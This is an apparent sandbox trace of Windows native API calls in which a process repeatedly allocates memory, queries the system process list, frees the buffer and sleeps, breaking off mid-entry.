0x0 [0163.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.793] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.804] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.824] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.834] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.851] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.870] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.881] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.897] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.921] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.928] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.945] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.960] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.977] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.992] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.007] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.023] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.038] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.053] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.075] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.086] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.101] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.137] 